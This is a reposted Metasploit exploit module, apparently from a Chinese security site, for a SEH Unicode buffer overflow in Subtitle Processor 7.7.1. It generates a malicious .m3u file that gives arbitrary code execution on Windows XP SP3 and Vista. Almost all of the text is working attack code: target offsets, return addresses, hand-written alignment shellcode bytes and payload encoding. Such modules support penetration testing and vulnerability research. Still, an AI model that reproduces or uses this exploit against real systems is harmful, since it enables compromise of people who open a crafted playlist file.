首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2011-05-04  

##
# $Id: subtitle_processor_m3u_bof.rb 12461 2011-04-28 08:12:32Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow",
   'Description'    => %q{
     This module exploits a vulnerability found in Subtitle Processor 7.  By
    supplying a long string of data as a .m3u file, Subtitle Processor first converts
    this input in Unicode, which expands the string size, and then attempts to copy it
    inline on the stack.  This results a buffer overflow with SEH overwritten, allowing
    arbitrary code execution.
   },
   'License'        => MSF_LICENSE,
   'Version'        => "$Revision: 12461 $",
   'Author'         =>
    [
     'Brandon Murphy',  #Initial discovery, poc
     'sinn3r',          #Metasploit
    ],
   'References'     =>
    [
     [ 'URL', 'http://sourceforge.net/projects/subtitleproc/' ],
     [ 'URL', 'http://www.exploit-db.com/exploits/17217/' ],
    ],
   'Payload'        =>
    {
     'BadChars'        => "\x00\x0a\x0c\x0d\x1a\x3a\x5c\x80",
     'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,
     'BufferRegister'  => 'ECX',
     'StackAdjustment' => -3500,
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "seh",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'Windows XP SP3',
      {
       'Nop'    => 0x43,    #ADD BYTE PTR DS:[EBX],AL
       'Offset' => 4078,    #Offset to SEH chain
       'Ret'    => 0x57b4,  #Unicode compatible P/P/R (Subtitle.exe)
       'Max'    => 5000,    #Max buffer size
      },
     ],
     [
      'Windows Vista SP0',
      {
       'Nop'    => 0x40,    #ADD BYTE PTR DS:[EAX],AL
       'Offset' => 4078,    #Offset to SEH chain
       'Ret'    => 0x57b4,  #Unicode compatible P/P/R (Subtitle.exe)
       'Max'    => 5000,    #Max buffer size
      }
     ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Apr 26 2011" ))

   register_options(
    [
     OptString.new('FILENAME', [false, 'M3U filename', 'msf.m3u'])
    ], self.class)
 end

 def get_unicode_payload(p)
  encoder = framework.encoders.create("x86/unicode_mixed")
  encoder.datastore.import_options_from_hash( {'BufferRegister'=>'ECX'} )
  unicode_payload = encoder.encode(p, nil, nil, platform)
  return unicode_payload
 end

 def exploit

  #NOP between each instruction
  nop = target['Nop']

  sploit = ''

  #Create the exploit
  if target.name =~ /XP/

   #PUSH ESI / POP EAX / XOR AL,73 / INC EAX / XOR AL,C2 / XCHG EAX,ECX / JMP ECX
   alignment = "\x56\x58\x34\x73\x40\x34\xc2\x91\xff\xe1"
   tmp = alignment << payload.encoded
   p = get_unicode_payload(tmp)

   #4050 bytes for shellcode
   sploit << rand_text_alpha(2)  #Padding
   sploit << p
   sploit << rand_text_alpha(target['Offset']-sploit.length)
   sploit << "\x61"
   sploit << nop
   sploit << [target.ret].pack('V*')
   sploit << nop
   sploit << "\x61"  #POPAD
   sploit << nop
   sploit << "\x61"  #POPAD
   sploit << nop
   sploit << "\x61"  #POPAD
   sploit << nop
   sploit << "\x51"  #PUSH ECX (for x86/unicode_mixed)
   sploit << nop
   sploit << "\x5e"  #POP ESI (for AlphanumMixed BufferRegister=ECX)
   sploit << nop
   sploit << "\x51"  #PUSH ECX
   sploit << nop
   sploit << "\xc3"  #RETN
   sploit << rand_text_alpha(target['Max']-sploit.length)

  elsif target.name =~ /Vista/

   # PUSH ESI / POP ECX / XOR CL,5F / XOR CL, 70 / INC ECX / XOR CL,FF / INC ECX / XOR CL,5F / XOR CL,4E / JMP ECX
   alignment  = "\x56\x59\x80\xf1\x5f\x80\xf1\x70\x41\x80\xf1\xff\x41\x80\xf1\x5f\x80\xf1\x4e\xff\xe1"
   tmp = alignment << payload.encoded
   p = get_unicode_payload(tmp)

   #4008 bytes of space for shellcode
   sploit << rand_text_alpha(62)
   sploit << p
   sploit << rand_text_alpha(target['Offset']-sploit.length)
   sploit << "\x61"
   sploit << nop
   sploit << [target.ret].pack('V*')
   sploit << nop
   sploit << "\x61"
   sploit << nop
   sploit << "\x61"
   sploit << nop
   sploit << "\x5e"
   sploit << nop
   sploit << "\x5e"
   sploit << nop
   sploit << "\x5e"
   sploit << nop
   sploit << "\x5e"
   sploit << nop
   sploit << "\x56"
   sploit << nop
   sploit << "\x59"
   sploit << nop
   sploit << "\x56"
   sploit << nop
   sploit << "\xc3"
   sploit << nop
   sploit << rand_text_alpha(target['Max']-sploit.length)

  end

  #Generate file
  print_status("Creating #{datastore['FILENAME']}...")
  file_create(sploit)

 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OSX/Intel reverse_tcp shell x8
·Microsoft Office Excel Axis Pr
·NetOp Remote Control 8.0, 9.1,
·MJM Core Player 2011 .s3m Stac
·libmodplug <= 0.8.8.2 .abc Sta
·MJM QuickPlayer 1.00 beta 60a
·EMC HomeBase Server Directory
·OpenMyZip V0.1 .ZIP File Buffe
·ICONICS WebHMI ActiveX Stack O
·Subtitle Processor 7.7.1 SEH U
·Exponent CMS 2.0 Beta 1.1 CSRF
·Multiple Vendors libc/glob(3)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved